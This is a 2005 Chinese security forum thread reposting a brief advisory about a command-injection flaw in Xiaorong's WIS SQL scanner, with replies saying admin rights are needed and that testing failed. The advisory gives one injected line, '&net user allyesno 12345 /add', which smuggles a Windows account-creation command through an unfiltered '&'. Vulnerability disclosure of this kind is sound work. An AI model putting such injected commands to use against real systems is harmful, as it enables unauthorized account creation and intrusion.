注册
登录
论坛
搜索
社区银行
帮助
导航
私人消息 (0)
公共消息 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
黑色海岸线论坛
»
网络安全
» 小榕的WIS漏洞(ALLyeSNO)
返回列表
发帖
黑白交错
该用户已被删除
楼主
跳转到
»
倒序看帖
打印
字体大小:
t
T
黑白交错
发表于 2005-2-3 23:39
|
只看该作者
小榕的WIS漏洞(ALLyeSNO)
erm : FreeXploiT
Author : ALLyeSNO
Date : 2005-2-2
WIS是小榕开发的SQL漏洞扫描工具
WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码
&net user allyesno 12345 /add
收藏
分享
skyxhc
该用户已被删除
沙发
skyxhc
发表于 2005-2-4 10:39
|
只看该作者
小榕的WIS漏洞(ALLyeSNO)
那这种前提就是扫描者当前的账号要有添加用户的权限
TOP
黑白交错
该用户已被删除
板凳
黑白交错
发表于 2005-2-4 11:39
|
只看该作者
小榕的WIS漏洞(ALLyeSNO)
着贴书转的..我也学习中
TOP
黑白交错
该用户已被删除
地板
黑白交错
发表于 2005-2-6 14:48
|
只看该作者
小榕的WIS漏洞(ALLyeSNO)
b huiiiii
TOP
skyxhc
该用户已被删除
5
楼
skyxhc
发表于 2005-2-6 15:42
|
只看该作者
小榕的WIS漏洞(ALLyeSNO)
老实说,我测试还没有成功
TOP
黑白交错
该用户已被删除
6
楼
黑白交错
发表于 2005-2-6 16:40
|
只看该作者
小榕的WIS漏洞(ALLyeSNO)
上面有详细的解说啊!
TOP
返回列表
回复
发帖
使用交流
网络安全
网络技术
娱乐休闲
灌水乐园
文学天地
美图欣赏
网站办公
站务处理
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
